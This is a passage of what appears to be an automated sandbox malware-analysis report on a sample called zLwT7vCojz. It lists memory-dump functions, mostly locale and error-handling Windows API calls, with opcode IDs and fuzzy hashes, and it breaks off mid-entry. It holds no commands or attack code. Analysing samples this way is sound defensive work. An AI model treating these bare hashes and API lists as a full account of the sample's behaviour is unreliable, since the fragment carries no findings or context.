                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 04333C88
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                              • Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                              • Instruction ID: c514dd85b2f413d5b42ea62019556d2480ef19c0d8f45e2fcb6d07d4f880ce63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFE0B671101508AFCF216F64DE08A9A3F69FF44696B41D028FD068A231CB35EE63CB84
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                              • API String ID: 0-2784972518
                                                                                                                                                                                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                              • Instruction ID: bef9d5f7d9e275209ba743373a184845bb6f72858210175552b4707499161a94
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F317CB6901629DFDB14CF99C980AADBBF9FF08324F14504AD541A7310D771FA49CBA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                                              • API String ID: 0-248832578
                                                                                                                                                                                                                                              • Opcode ID: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                              • Instruction ID: 614f399d95143116b3192e5e5ce4c3d2d829a138337a651691659834fe0ab3ac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 873126719002496FDB249E78CC84EFB7BBDEF85315F1011A8F919D7290EA30B944CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                                              • API String ID: 0-248832578
                                                                                                                                                                                                                                              • Opcode ID: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                              • Instruction ID: 5858c32c973f9b028c51109d6fdea45301b38e121b5e506b78abc6587599c678
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A43124B1D04208AFCB24CE79CC84EEB7BBDDF85354F0401AEF41997252E6389D858B54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042069E,00000001,?,?,=CA,?,00420A3F,=CA,?,?,?,?,?,0041433D,?,?), ref: 0042040D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                              • String ID: =CA
                                                                                                                                                                                                                                              • API String ID: 1084509184-159236625
                                                                                                                                                                                                                                              • Opcode ID: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                              • Instruction ID: 2495996395a678c0b0b6d2c4eccef08732c43701ffe65dee0c881fbc629916fd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F0C8363003145FD7246F79AC9167A7BD5EF8035CB55842EFA458B641D6B59C428A04
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                              • Opcode ID: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
                                                                                                                                                                                                                                              • Instruction ID: 6b67f736e2e63cc60f408e8e0dfee7a9fd2cac623ca874a3f295f3da83e4a478
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88F0F631740218B7DB11AF61AC01FAE3B71DF48711F90005BFC0527292CE355E509A9D
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 331f1b043438bf50c0d0bb34769695c962d67a9a75435153f21e753d807b965d
                                                                                                                                                                                                                                              • Instruction ID: f30d0bf30d07b22a0eb694ad5c2c292086324127517158480631b2db696eab66
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 331f1b043438bf50c0d0bb34769695c962d67a9a75435153f21e753d807b965d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33023D71E002199FDF14CFA9D8806AEB7F1FF88325F1592AAD819EB344D731A941CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7299cbe181a480e96aa1d0823b8b75374db67f9795f27445fcbabf9e3bc0ca98
                                                                                                                                                                                                                                              • Instruction ID: 57b2c8c2af9200c539743d1e838558d093200d52225ae661a65c97ab255a42b1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7299cbe181a480e96aa1d0823b8b75374db67f9795f27445fcbabf9e3bc0ca98
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0433BAAD,00000000,?,00000008,?,?,04343896,00000000), ref: 0433BCDF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                              • Opcode ID: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                              • Instruction ID: feb4bd9b9a9343e7bc24e1d905511e2325d8cecc424340ad0b95ac0b30a4cd63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFB12C31610608DFD715CF28C486B65BBA0FF45366F259698E89ACF2E2C735F991CB40
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B846,?,?,00000008,?,?,0042362F,00000000), ref: 0041BA78
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                              • Opcode ID: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                              • Instruction ID: 0c2c29198f1904db5ab12468f0c2f7b68f4f63301914c53b8217cadea3e25972
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a74b9dc259a9f0ad9fa9a5fcf617859e4d67a11803a70fb154078e68e54c131
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CB17E716206088FD715CF28C486BA57BE0FF45364F258659E9D9CF3A1C739E982CB84
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FDF
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FEC
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04340959
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                                              • Opcode ID: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                              • Instruction ID: 07260ebc37a46f7c65885f3d08683d3ef005ebd982decdbab8267f8e4ca20eeb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36219D72A15206ABEB28AE64CC41BBA73F8EF81315F10217AEF0596150EB75B944CA50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004206F2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                                              • Opcode ID: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                              • Instruction ID: 9cee96005927a1573ed79b1b6da19a4e5e72af736dd4be10e0bf17a0e1069c17
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7421A472610226ABDB249A25EC41BBB77E8EB80314F50017FFD05D6242EB79ED44CB59
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,043345A4,?,04340CE2,00000000,?,?,?), ref: 043405FF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                                              • Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                              • Instruction ID: 03d2e842734334e81b7f88b6fbf1679f2540d5c3d29d808f051ef2c9eb18b701
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F71106367043019FEB18AF39D8916BAB7E1FFC0319B14442DEA8687A40D7757542CB40
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,043408D3,00000000,00000000,?), ref: 04340B61
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                                                                                                              • Opcode ID: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                              • Instruction ID: 4f1bb8f9949aeba609493505220b7dc7ac2d40734d8e87f86c255a1316c98e0a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41F0F9327101167FDB2C5A248845BFE77B8DB8076CF050969EE45A3140EA34FD4186D8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042066C,00000000,00000000,?), ref: 004208FA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                                                                                                              • Opcode ID: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                              • Instruction ID: 95b118f29787940bb019709f183f2c3e5714f1a92d3f33ac24e0601bbd6709b7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03F04E727001257FEB245B1598057BB77A8DB40314F51442AEC47A3242DA38BD81C5D4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FDF
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FEC
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04340959
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                                              • Opcode ID: a5e2e27661e3b7b444401f33bbcec4a2cbcde23cc4fdcda85679ab9cc1de8dfe
                                                                                                                                                                                                                                              • Instruction ID: 56c15eba34e1d8a9d82db0ded2e5aae82e44c391677c5b3fe80e1507a88db12e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5e2e27661e3b7b444401f33bbcec4a2cbcde23cc4fdcda85679ab9cc1de8dfe
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F0A432B51209ABEB28AB64DC41BFA73ACDF85325F0111BAFB06D7250DA747D058794
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _free.LIBCMT ref: 04336FB7
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: SetLastError.KERNEL32(00000000), ref: 04336FF8
                                                                                                                                                                                                                                                • Part of subcall function 04336F80: _abort.LIBCMT ref: 04336FFE
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042069E,00000001,?,?,043345A4,?,04340CA6,043345A4,?,?,?,?,?,043345A4,?,?), ref: 04340674
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                                              • Opcode ID: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                              • Instruction ID: f6d35e189c9f616e2ceadf97643519e237f1e6055d26b7a3b2c115764f64a886
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67F046363003051FEB289F399C91ABA7BE0EFC032CF15442DFA068B680D6B5B802CA44
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,04334002,?,00000004), ref: 0433779E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
